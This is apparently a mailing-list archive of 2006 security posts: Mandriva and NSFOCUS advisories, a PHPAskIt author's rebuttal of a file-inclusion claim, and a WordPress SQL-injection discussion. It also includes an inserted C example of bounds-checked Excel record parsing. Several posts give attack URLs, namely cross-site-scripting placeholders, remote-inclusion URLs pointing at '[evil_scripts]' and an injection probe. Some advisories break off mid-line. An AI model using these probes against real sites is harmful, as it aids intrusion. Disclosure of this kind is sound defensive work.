Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.
This vulnerability does not exist. Even with register_globals on, $dir and $qadir are overridden by a static variable within the script itself.
[ MDKSA-2006:121 ] - Updated xine-lib packages fix buffer overflow vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:121
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : xine-lib
 Date    : July 12, 2006
 Affected: 2006.0, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 Stack-based buffer overflow in MiMMS 0.0.9 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via the (1) send_command, (2) string_utf16, (3) get_data, and (4) get_media_packet functions, and possibly other functions.

 Xine-lib contains an embedded copy of the same vulnerable code.

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2200
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2006.0:
 34c23d8a858d2a2687297e25618c7b04  2006.0/RPMS/libxine1-1.1.0-9.6.20060mdk.i586.rpm
 57f9a069b8fc968a12ce24605390c1f1  2006.0/RPMS/libxine1-devel-1.1.0-9.6.20060mdk.i586.rpm
 7c2652ce586d087793536649d7da6966  2006.0/RPMS/xine-aa-1.1.0-9.6.20060mdk.i586.rpm
 37eff9bda8595acfbaf80e0998db1c9e  2006.0/RPMS/xine-arts-1.1.0-9.6.20060mdk.i586.rpm
 e5672e6558978051f6878dea6ba961b5  2006.0/RPMS/xine-dxr3-1.1.0-9.6.20060mdk.i586.rpm
 6527706516fb99a53f82d2c8c4b2e5f8  2006.0/RPMS/xine-esd-1.1.0-9.6.20060mdk.i586.rpm
 10d172825fdd5dd2dd92dfafd5d60e23  2006.0/RPMS/xine-flac-1.1.0-9.6.20060mdk.i586.rpm
 87b9a38b877b67f0ac0ee4f58ed50983  2006.0/RPMS/xine-gnomevfs-1.1.0-9.6.20060mdk.i586.rpm
 8656ea92b3fca51e2fad861ea963b14d  2006.0/RPMS/xine-image-1.1.0-9.6.20060mdk.i586.rpm
 6a538ee35d785dfc7ea64a03c20060da  2006.0/RPMS/xine-plugins-1.1.0-9.6.20060mdk.i586.rpm
 9defa64950f2feebab9dda16d35523cb  2006.0/RPMS/xine-polyp-1.1.0-9.6.20060mdk.i586.rpm
 d207307cb338b46edd703797b693ea24  2006.0/RPMS/xine-smb-1.1.0-9.6.20060mdk.i586.rpm
 4dc1623162c6092eb10c755ed2c5366a  2006.0/SRPMS/xine-lib-1.1.0-9.6.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 8798915891b79ac134565f8ede0653b1  x86_64/2006.0/RPMS/lib64xine1-1.1.0-9.6.20060mdk.x86_64.rpm
 dcd2eb828f921b04206124835eeada8e  x86_64/2006.0/RPMS/lib64xine1-devel-1.1.0-9.6.20060mdk.x86_64.rpm
 a933644c1c56d642a5d576cb217d0356  x86_64/2006.0/RPMS/xine-aa-1.1.0-9.6.20060mdk.x86_64.rpm
 238d8526e618dff3aa31e223c14ce432  x86_64/2006.0/RPMS/xine-arts-1.1.0-9.6.20060mdk.x86_64.rpm
 d9f0269ae701936ce27b6515e5c73ac1  x86_64/2006.0/RPMS/xine-dxr3-1.1.0-9.6.20060mdk.x86_64.rpm
 4683507048ec6535c2c5f63997ec719d  x86_64/2006.0/RPMS/xine-esd-1.1.0-9.6.20060mdk.x86_64.rpm
 bc649ad82f11c8422f1e9fb711dd4803  x86_64/2006.0/RPMS/xine-flac-1.1.0-9.6.20060mdk.x86_64.rpm
 52fe1d4ddeeea6ec91a776ccacf5df19  x86_64/2006.0/RPMS/xine-gnomevfs-1.1.0-9.6.20060mdk.x86_64.rpm
 348cc9ecf59e378b3d1c6aa12a35f9b9  x86_64/2006.0/RPMS/xine-image-1.1.0-9.6.20060mdk.x86_64.rpm
 d2f2300e0bd4e4e210bbfae485c07624  x86_64/2006.0/RPMS/xine-plugins-1.1.0-9.6.20060mdk.x86_64.rpm
 afca19bc708fc5964c19fff3a2d16286  x86_64/2006.0/RPMS/xine-polyp-1.1.0-9.6.20060mdk.x86_64.rpm
 ba7c60488a4459066ba4ed08046ce48c  x86_64/2006.0/RPMS/xine-smb-1.1.0-9.6.20060mdk.x86_64.rpm
 4dc1623162c6092eb10c755ed2c5366a  x86_64/2006.0/SRPMS/xine-lib-1.1.0-9.6.20060mdk.src.rpm

 Corporate 3.0:
 1390c15ca893041af1076e6a02d14f47  corporate/3.0/RPMS/libxine1-1-0.rc3.6.12.C30mdk.i586.rpm
 ecc53b859629edd48ef27b477332889e  corporate/3.0/RPMS/libxine1-devel-1-0.rc3.6.12.C30mdk.i586.rpm
 a4d85795d05266793fa61ba6bc986aa6  corporate/3.0/RPMS/xine-aa-1-0.rc3.6.12.C30mdk.i586.rpm
 4dd4249d6b1911501ddcfa1ef36470af  corporate/3.0/RPMS/xine-arts-1-0.rc3.6.12.C30mdk.i586.rpm
 c9a3f82dad17f32a6ab6c0b1926c52c1  corporate/3.0/RPMS/xine-dxr3-1-0.rc3.6.12.C30mdk.i586.rpm
 c40b65dd7cde826b8bfa5fb5720d15ed  corporate/3.0/RPMS/xine-esd-1-0.rc3.6.12.C30mdk.i586.rpm
 2a257f092fe4b304be7e358230aa0361  corporate/3.0/RPMS/xine-flac-1-0.rc3.6.12.C30mdk.i586.rpm
 b04b482c8693272f7ead71ac3ce91e7f  corporate/3.0/RPMS/xine-gnomevfs-1-0.rc3.6.12.C30mdk.i586.rpm
 ae63549d198004056aacacee5b2ccbef  corporate/3.0/RPMS/xine-plugins-1-0.rc3.6.12.C30mdk.i586.rpm
 d8fe8f9dff1190413e81e82e67762462  corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.12.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 aad2ac9345e05d900910b8beade5ff21  x86_64/corporate/3.0/RPMS/lib64xine1-1-0.rc3.6.12.C30mdk.x86_64.rpm
 b9540819f0250a2924297ce0388f6202  x86_64/corporate/3.0/RPMS/lib64xine1-devel-1-0.rc3.6.12.C30mdk.x86_64.rpm
 53cc9dc911be64bf8764d76262df4a44  x86_64/corporate/3.0/RPMS/xine-aa-1-0.rc3.6.12.C30mdk.x86_64.rpm
 280b7a7ceb168225d30eb97e95f45fb6  x86_64/corporate/3.0/RPMS/xine-arts-1-0.rc3.6.12.C30mdk.x86_64.rpm
 4e3811096df50e37e6b10f
FLV Players Multiple Input Validation Vulnerabilities
Product : FLV Players 8
Website : http://www.videospark.com

[+] Full path disclosure:

1) http://localhost/flv8/paginate.php
   Fatal error: Class simplepagemaker: Cannot inherit from undefined class object in /var/www/zero/httpdocs/flv8/paginate.php on line 45

2) http://localhost/flv8/player.php?p=somthing
   Fatal error: SimplePageMaker::make() - out of bounds in page chihaja in /var/www/zero/httpdocs/flv8/paginate.php on line 131

[+] Multiple cross-site scripting PoC:

http://localhost/flv8/player.php?url=[XSS]
http://localhost/flv8/popup.php?url=%3C/title%3E[XSS]
http://localhost/flv8/popup.php?url=%22%3E%3C[XSS]

Mourad
Contact : [EMAIL PROTECTED]
Moroccan Security Research Team
NSFOCUS SA2006-05 : Microsoft Excel SELECTION Record Memory Corruption Vulnerability
NSFOCUS Security Advisory (SA2006-05)

Microsoft Excel SELECTION Record Memory Corruption Vulnerability

Release Date: 2006-07-12
CVE ID: CVE-2006-1302
http://www.nsfocus.com/english/homepage/research/0605.htm

Affected systems & software
===========================
Microsoft Excel 2000
Microsoft Excel 2002
Microsoft Excel 2003

Unaffected systems & software
=============================

Summary
=======
NSFocus Security Team discovered a memory corruption vulnerability in Microsoft Excel's processing of the SELECTION record, which allows remote attackers to run arbitrary code via carefully crafted Excel files.

Description
===========
Excel does not perform a sufficient check on a certain field when processing the SELECTION record. During a data copying operation the user-supplied data might be used for the copying, resulting in memory corruption and arbitrary code execution.

Attackers can craft an Excel file with a malformed SELECTION record and lure users into opening it via instant messaging tools, e-mail or other vectors, resulting in arbitrary code execution with the privileges of the user. If the user is the administrator, attackers might take complete control over the system.

Workaround
==========
Do not open any Excel file from untrusted sources.

Vendor Status
=============
2006.03.30 Informed the vendor
2006.04.03 Vendor confirmed the vulnerability
2006.07.11 Microsoft has released a security bulletin (MS06-037) and related patches. For more details about the security bulletin, please refer to:
http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx

Additional Information
======================
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-1302 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries.

Acknowledgment
==============
Wen Yujie of NSFocus Security Team found the vulnerability.

DISCLAIMS
=========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA
Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.
Hi there,

I would like to point out that the security vulnerability quoted below (and seen here: http://archives.neohapsis.com/archives/bugtraq/2006-06/0234.html - submitted to bugtraq on June 12, 2006) concerning the CodeGrrl.com script, PHPAskIt, is incorrect.

I am the author of this script and can confidently say that no such hack can take place through the convertaa.php and convertwakqa.php files. This has been fully tested by myself and others when we became aware of the supposed vulnerability.

The reason why a file inclusion cannot take place through the query string is because $qadir and $dir are defined within the script. Even with register_globals on, any instance of these variables declared as part of the query string (convertaa.php?qadir=[url to malicious script], for example) will be overwritten with the version in the script.

The files work as such:

convertaa.php:

    <?php
    $qadir = "/home/user/public_html/somefolder/"; // Ask&Answer installation path (WITH trailing slash)

    if (file_exists($qadir . "config.php")) { // checking for config.php in this folder and including it if it exists
        include($qadir . "config.php");
    } else { // if it doesn't exist
        die("Error: Ask&Answer's config.php could not be found. Please make sure this file exists in the directory you have specified and try again.");
    }

    // database conversion happens here
    ?>

convertwakqa.php:

    <?php
    $dir = "/home/user/public_html/somefolder/"; // replace with absolute path to your Wak's A&A directory (WITH SLASH AT THE END!)

    if (file_exists($dir . "functions.php")) { // checking for a functions.php file in above directory and including it if it exists
        include($dir . "functions.php");
    } else {
        die("Error: Wak's Ask&Answer's functions.php could not be found. Please make sure this file exists in your Wak's Ask&Answer directory.");
    }

    if (file_exists("../config.php")) { // checking for config.php in parent folder and including if exists
        include("../config.php");
    } else {
        die("Error: Could not find PHPAskIt's config.php. Without this file, the script cannot operate. Please make sure it exists.");
    }

    // database conversion
    ?>

As you can see, $dir and $qadir are defined and cannot be overwritten by additional variables in the GET array, or query string. Furthermore, PHPAskIt 2.0+ will not run if any of the import files are left in place.

Please could you notify readers of any sites that may list this vulnerability that it is a hoax. CodeGrrl.com has recently come under fire for similar vulnerabilities in older scripts, and, being that PHPAskIt was released AFTER those were discovered, it was imperative that this sort of thing was avoided. Quite frankly I find it insulting that somebody has decided that I would be capable of leaving such a large security hole in my script when it was written a good three years after most of CodeGrrl.com's previous scripts, which contained a multiple file inclusion vulnerability in their password protection file, protection.php. I would never have left such an obvious hole in my own script.

It is our (CodeGrrl.com's) belief that people are spreading rumours about our newer scripts in an effort to further tarnish the site's reputation. However, PHPAskIt is NOT VULNERABLE TO REMOTE FILE INCLUSION.

Thank you for clearing this up on your site(s),

Amelie
CodeGrrl.com Staff

----- Original Message -----

#   /\/\!|_|_! |-|4|23|<47
#
# Milli-Harekat Advisory ( www.milli-harekat.org )
# PHPAskIt <= v2.0.1 - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : PHPAskIt v2.0.1
# Credits : ERNE erne[at]ernealizm[dot]com
# Thanks : Dj_ReMix, The_bekir, SpC-x, Eskobar, LiZ0zim, EntRýk4, Korsan.Di_lejyoner and All MHG USERS
# Vulnerable :
http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir=[evil_scripts]
http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir=[evil_scripts]
Re: WordPress 2.0.3 SQL Error and Full Path Disclosure
Isn't this actually an SQL injection rather than information leakage? Try:

http://localhost/wordpress/index.php?paged=%27

I mean, the error message (this time in English) is:

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1]

It specifically says that "You have an error in your SQL syntax", which means my input goes into the query...

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Sunday, July 02, 2006 12:15
To: bugtraq@securityfocus.com
Subject: WordPress 2.0.3 SQL Error and Full Path Disclosure

WordPress 2.0.3 SQL Error and Full Path Disclosure

Discovered By zero [Moroccan Security Team]
Software: WordPress 2.0.3
Site : www.wordpress.org

~ SQL Error ~

Example: http://localhost/wordpress/index.php?paged=-1

Result:
WordPress database error: [Erreur de syntaxe près de '-20, 10' à la ligne 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <= '2006-06-29 12:46:59' AND (post_status = "publish") AND post_status != "attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT -20, 10

~ Full path ~

/wp-settings.php
/wp-admin/admin-footer.php
/wp-admin/admin-functions.php
/wp-admin/edit-form.php
/wp-admin/edit-form-advanced.php
/wp-admin/edit-form-comment.php
/wp-admin/edit-link-form.php
/wp-admin/edit-page-form.php
/wp-admin/menu.php
/wp-admin/menu-header.php
/wp-admin/upgrade-functions.php
/wp-admin/upgrade-schema.php
/wp-admin/import/blogger.php
/wp-admin/import/dotclear.php
/wp-admin/import/livejournal.php
/wp-admin/import/mt.php
/wp-admin/import/rss.php
/wp-admin/import/textpattern.php
/wp-content/plugins/hello.php
/wp-content/plugins/wp-db-backup.php
/wp-content/plugins/akismet/akismet.php
/wp-content/themes/classic/index.php
/wp-content/themes/classic/comments.php
/wp-content/themes/classic/comments-popup.php
/wp-content/themes/classic/footer.php
/wp-content/themes/classic/header.php
/wp-content/themes/classic/sidebar.php
/wp-content/themes/default/index.php
/wp-content/themes/default/404.php
/wp-content/themes/default/archive.php
/wp-content/themes/default/archives.php
/wp-content/themes/default/attachment.php
/wp-content/themes/default/comments-popup.php
/wp-content/themes/default/footer.php
/wp-content/themes/default/functions.php
/wp-content/themes/default/header.php
/wp-content/themes/default/links.php
/wp-content/themes/default/page.php
/wp-content/themes/default/search.php
/wp-content/themes/default/searchform.php
/wp-content/themes/default/sidebar.php
/wp-content/themes/default/single.php
/wp-includes/default-filters.php
/wp-includes/kses.php
/wp-includes/locale.php
/wp-includes/rss-functions.php
/wp-includes/template-loader.php
/wp-includes/vars.php
/wp-includes/wp-db.php

Greetz: simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure, hunter, themenotor ...

Contact:
Author: Mourad [ zero ]
Email : xzerox(at)linuxmail(dot)org
New CVE number states Excel Style handling as a separate issue
The new CVE document http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3431, published recently, confirms the information that the Microsoft Excel Style handling vulnerability, aka the Nanika.xls issue, is a separate vulnerability. This vulnerability affects only the Simplified Chinese, Traditional Chinese, Japanese and Korean versions of Excel. This vulnerability (let's say the 4th Excel vulnerability) uses Repair Mode too, and user interaction is needed.

This information has been updated in my First Microsoft Excel 0-day Vulnerability FAQ document at SecuriTeam Blogs. If a fix for this vulnerability is included in the monthly July updates from Microsoft, it's expected that CVE-2006-3431 will be listed in the upcoming security bulletin to clarify the situation.

The so-called 1st Excel code execution vulnerability reported in June is http://www.microsoft.com/technet/security/advisory/921365.mspx and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3059

- Juha-Matti
NSFOCUS SA2006-06 : Microsoft Excel COLINFO Record Buffer Overflow Vulnerability
NSFOCUS Security Advisory (SA2006-06)

Microsoft Excel COLINFO Record Buffer Overflow Vulnerability

Release Date: 2006-07-12
CVE ID: CVE-2006-1304
http://www.nsfocus.com/english/homepage/research/0606.htm

Affected systems & software
===========================
Microsoft Excel 2000
Microsoft Excel 2002
Microsoft Excel 2003

Unaffected systems & software
=============================

Summary
=======
NSFocus Security Team discovered a buffer overflow vulnerability in Microsoft Excel's processing of the COLINFO record, which allows remote attackers to run arbitrary code via carefully crafted Excel files.

Description
===========
Excel does not perform a sufficient check on a certain field when processing the COLINFO record, which might cause a buffer overflow in a data filling operation. Attackers can run arbitrary code via carefully crafted data.

Attackers can craft an Excel file with a malformed COLINFO record and lure users into opening it via instant messaging tools, e-mail or other vectors, resulting in arbitrary code execution with the privileges of the user. If the user is the administrator, attackers might take complete control over the system.

Workaround
==========
Do not open any Excel file from untrusted sources.

Vendor Status
=============
2006.03.30 Informed the vendor
2006.04.03 Vendor confirmed the vulnerability
2006.07.11 Microsoft has released a security bulletin (MS06-037) and related patches. For more details about the security bulletin, please refer to:
http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx

Additional Information
======================
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-1304 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries.

Acknowledgment
==============
Wen Yujie of NSFocus Security Team found the vulnerability.

DISCLAIMS
=========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA
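Both NSFOCUS advisories above (SA2006-05 on the SELECTION record and SA2006-06 on the COLINFO record) describe the same class of defect: a count or length field read from the file is trusted during a copy into fixed-size storage. The advisories do not say which field was unchecked, so the following is an added example, not NSFOCUS's analysis or Microsoft's code: a bounds-checked walker for a BIFF8 record stream. The record type constants (0x001D SELECTION, 0x0809 BOF, 0x000A EOF) and the SELECTION layout (pane, rwAct, colAct, irefAct, cref, then cref six-byte Ref8 entries) follow the documented BIFF8 format; MAX_REFS, the function names and the sample streams are assumptions constructed for this example. The two checks in parse_selection, count against remaining record length and count against destination capacity, are the ones a parser of any count-prefixed record (COLINFO included) needs.

```c
/* Added example (not NSFOCUS or Microsoft code): bounds-checked BIFF8 record
 * walker. Record layout and type values follow the documented BIFF8 format;
 * MAX_REFS and the sample streams below are assumptions for this example. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define REC_EOF       0x000A
#define REC_SELECTION 0x001D
#define SEL_FIXED_LEN 9    /* pane(1) rwAct(2) colAct(2) irefAct(2) cref(2) */
#define REF8_LEN      6    /* rwFirst(2) rwLast(2) colFirst(1) colLast(1)  */
#define MAX_REFS      16   /* capacity of the fixed destination array (assumption) */

enum biff_status {
    BIFF_OK = 0,
    BIFF_ERR_TRUNC_HEADER,  /* fewer than 4 bytes left for a record header */
    BIFF_ERR_TRUNC_BODY,    /* declared record length runs past the stream */
    BIFF_ERR_SEL_SHORT,     /* SELECTION shorter than its fixed fields     */
    BIFF_ERR_SEL_CREF_LEN,  /* cref*6 does not fit inside the record body  */
    BIFF_ERR_SEL_CREF_CAP,  /* cref exceeds the destination array capacity */
    BIFF_ERR_NO_EOF         /* stream ended without an EOF record          */
};

struct ref8 { uint16_t rw_first, rw_last; uint8_t col_first, col_last; };
struct selection {
    uint8_t  pane;
    uint16_t rw_act, col_act, iref_act, cref;
    struct ref8 refs[MAX_REFS];
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Parse one SELECTION body of len bytes into *sel. The unchecked form,
 * memcpy(sel->refs, p + 9, cref * 6), trusts a 16-bit count from the file
 * (up to 393210 bytes) against a 96-byte array; the two checks below stop it. */
static enum biff_status parse_selection(const uint8_t *p, size_t len, struct selection *sel)
{
    if (len < SEL_FIXED_LEN) return BIFF_ERR_SEL_SHORT;
    sel->pane = p[0];
    sel->rw_act = rd16(p + 1);   sel->col_act = rd16(p + 3);
    sel->iref_act = rd16(p + 5); sel->cref = rd16(p + 7);
    if ((size_t)sel->cref * REF8_LEN > len - SEL_FIXED_LEN) return BIFF_ERR_SEL_CREF_LEN;
    if (sel->cref > MAX_REFS) return BIFF_ERR_SEL_CREF_CAP;
    for (uint16_t i = 0; i < sel->cref; i++) {
        const uint8_t *r = p + SEL_FIXED_LEN + (size_t)i * REF8_LEN;
        sel->refs[i].rw_first = rd16(r);  sel->refs[i].rw_last = rd16(r + 2);
        sel->refs[i].col_first = r[4];    sel->refs[i].col_last = r[5];
    }
    return BIFF_OK;
}

/* Walk records (2-byte type, 2-byte length, body) until EOF; every length is
 * checked against what is actually left in the buffer before it is used. */
enum biff_status walk_biff(const uint8_t *buf, size_t len, struct selection *sel, int *nsel)
{
    size_t off = 0;
    *nsel = 0;
    while (off < len) {
        if (len - off < 4) return BIFF_ERR_TRUNC_HEADER;
        uint16_t type = rd16(buf + off), rlen = rd16(buf + off + 2);
        off += 4;
        if (rlen > len - off) return BIFF_ERR_TRUNC_BODY;
        if (type == REC_SELECTION) {
            enum biff_status st = parse_selection(buf + off, rlen, sel);
            if (st != BIFF_OK) return st;
            (*nsel)++;
        } else if (type == REC_EOF) {
            return BIFF_OK;
        }
        off += rlen;  /* any other record type is skipped by its declared length */
    }
    return BIFF_ERR_NO_EOF;
}

int biff_check(const uint8_t *buf, size_t len)
{
    struct selection s; int n;
    return (int)walk_biff(buf, len, &s, &n);
}

int count_selections(const uint8_t *buf, size_t len)
{
    struct selection s; int n;
    return walk_biff(buf, len, &s, &n) == BIFF_OK ? n : -1;
}

/* Constructed sample streams (not taken from any real .xls file). */
const uint8_t good_stream[] = {
    0x09,0x08, 0x00,0x00,                               /* BOF, empty body (simplified) */
    0x1D,0x00, 0x0F,0x00,                               /* SELECTION, 9 + 1*6 = 15 bytes */
    0x03, 0x02,0x00, 0x01,0x00, 0x00,0x00, 0x01,0x00,   /* pane=3 rwAct=2 colAct=1 irefAct=0 cref=1 */
    0x02,0x00, 0x02,0x00, 0x01, 0x01,                   /* one Ref8: rows 2..2, cols 1..1 */
    0x0A,0x00, 0x00,0x00                                /* EOF */
};
const uint8_t bad_cref_len[] = {                        /* cref=1000 but the body holds one Ref8 */
    0x1D,0x00, 0x0F,0x00,
    0x03, 0x02,0x00, 0x01,0x00, 0x00,0x00, 0xE8,0x03,
    0x02,0x00, 0x02,0x00, 0x01, 0x01,
    0x0A,0x00, 0x00,0x00
};
const uint8_t bad_trunc[] = { 0x1D,0x00, 0x0F,0x00, 0x03, 0x02,0x00 }; /* 15 claimed, 3 present */
const uint8_t bad_hdr[]   = { 0x1D,0x00, 0x0F };                        /* header itself cut short */

/* Build a SELECTION whose cref is consistent with its length but may exceed
 * MAX_REFS: the length check alone does not catch this case. */
int check_cap_case(unsigned cref)
{
    uint8_t buf[256];
    size_t body = SEL_FIXED_LEN + (size_t)cref * REF8_LEN;
    if (4 + body + 4 > sizeof buf) return -1;
    memset(buf, 0, sizeof buf);
    buf[0] = 0x1D; buf[2] = (uint8_t)body; buf[3] = (uint8_t)(body >> 8);
    buf[4 + 7] = (uint8_t)cref; buf[4 + 8] = (uint8_t)(cref >> 8);
    buf[4 + body] = 0x0A;                               /* EOF record follows the body */
    return biff_check(buf, 4 + body + 4);
}

int main(void)
{
    printf("good stream: status %d, selections %d\n",
           biff_check(good_stream, sizeof good_stream),
           count_selections(good_stream, sizeof good_stream));
    printf("cref larger than body: status %d\n", biff_check(bad_cref_len, sizeof bad_cref_len));
    printf("cref beyond capacity:  status %d\n", check_cap_case(MAX_REFS + 1));
    return 0;
}
```

The point of check_cap_case is that a record can be internally consistent (cref matches the declared length) and still overflow the parser's own storage; a parser that only validates the file's fields against each other, and not against its own buffers, still has the bug the advisories describe.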
[ MDKSA-2006:120 ] - Updated samba packages fix DoS vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:120
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : samba
 Date    : July 10, 2006
 Affected: 10.2, 2006.0, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability in samba 3.0.x was discovered where an attacker could cause a single smbd process to bloat, exhausting memory on the system. This bug is caused by continually increasing the size of an array which maintains state information about the number of active share connections.

 Updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3403
 http://www.samba.org/samba/security/CAN-2006-3403.html
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 10.2:
 3eb4f4fe83862cc464bec94f345b1205  10.2/RPMS/libsmbclient0-3.0.13-2.1.102mdk.i586.rpm
 20257c42dc31bfa2c7528e7033485aeb  10.2/RPMS/libsmbclient0-devel-3.0.13-2.1.102mdk.i586.rpm
 4abbb93b864aec424b863085e4cd17fe  10.2/RPMS/libsmbclient0-static-devel-3.0.13-2.1.102mdk.i586.rpm
 54c14b19aeda54fb096766938dcd7ba0  10.2/RPMS/mount-cifs-3.0.13-2.1.102mdk.i586.rpm
 6a718136f97f343c1673e9e82aa6685c  10.2/RPMS/nss_wins-3.0.13-2.1.102mdk.i586.rpm
 e0f0ca5db168dbec2ee78c47b04d4dfe  10.2/RPMS/samba-client-3.0.13-2.1.102mdk.i586.rpm
 aca4da8c53f090b9e41bd95690d95a27  10.2/RPMS/samba-common-3.0.13-2.1.102mdk.i586.rpm
 80c6725741baa3386e8d15a552a2e5aa  10.2/RPMS/samba-doc-3.0.13-2.1.102mdk.i586.rpm
 ef137687ddad3bee055d6d3870e74db8  10.2/RPMS/samba-passdb-mysql-3.0.13-2.1.102mdk.i586.rpm
 226357f0e98fa1c3b8abe17a23d1f715  10.2/RPMS/samba-passdb-pgsql-3.0.13-2.1.102mdk.i586.rpm
 80a8107ea3f020bc930ecde070aefb61  10.2/RPMS/samba-passdb-xml-3.0.13-2.1.102mdk.i586.rpm
 e2d6e9fa08e770f08171d75dd1079d5a  10.2/RPMS/samba-server-3.0.13-2.1.102mdk.i586.rpm
 62043615a61aa9424cee64634f6f8d95  10.2/RPMS/samba-smbldap-tools-3.0.13-2.1.102mdk.i586.rpm
 b76512984b8268a6c1d6474dd623c405  10.2/RPMS/samba-swat-3.0.13-2.1.102mdk.i586.rpm
 21f24f6b6d4ba6ebdaf259c9ad2ff894  10.2/RPMS/samba-vscan-clamav-3.0.13-2.1.102mdk.i586.rpm
 268ecfc08e5cd02ec69b2c3df9a79e3c  10.2/RPMS/samba-vscan-icap-3.0.13-2.1.102mdk.i586.rpm
 469c6f7ac18bb3f3e963b15d6ddb218b  10.2/RPMS/samba-winbind-3.0.13-2.1.102mdk.i586.rpm
 3cfae3f4e389c05b161fc03447fe8ea1  10.2/SRPMS/samba-3.0.13-2.1.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 1cabdda84ee642347b89b39f9b20647f  x86_64/10.2/RPMS/lib64smbclient0-3.0.13-2.1.102mdk.x86_64.rpm
 ac3ed439d87acb15e3c2e29c43a6c15c  x86_64/10.2/RPMS/lib64smbclient0-devel-3.0.13-2.1.102mdk.x86_64.rpm
 62220c9ea9b521ae9255351f9d2e9a72  x86_64/10.2/RPMS/lib64smbclient0-static-devel-3.0.13-2.1.102mdk.x86_64.rpm
 3eb4f4fe83862cc464bec94f345b1205  x86_64/10.2/RPMS/libsmbclient0-3.0.13-2.1.102mdk.i586.rpm
 20257c42dc31bfa2c7528e7033485aeb  x86_64/10.2/RPMS/libsmbclient0-devel-3.0.13-2.1.102mdk.i586.rpm
 4abbb93b864aec424b863085e4cd17fe  x86_64/10.2/RPMS/libsmbclient0-static-devel-3.0.13-2.1.102mdk.i586.rpm
 e3ee798596a4c1a3986046100967082d  x86_64/10.2/RPMS/mount-cifs-3.0.13-2.1.102mdk.x86_64.rpm
 f7cc4e909f28d48b265c11be4ea910d7  x86_64/10.2/RPMS/nss_wins-3.0.13-2.1.102mdk.x86_64.rpm
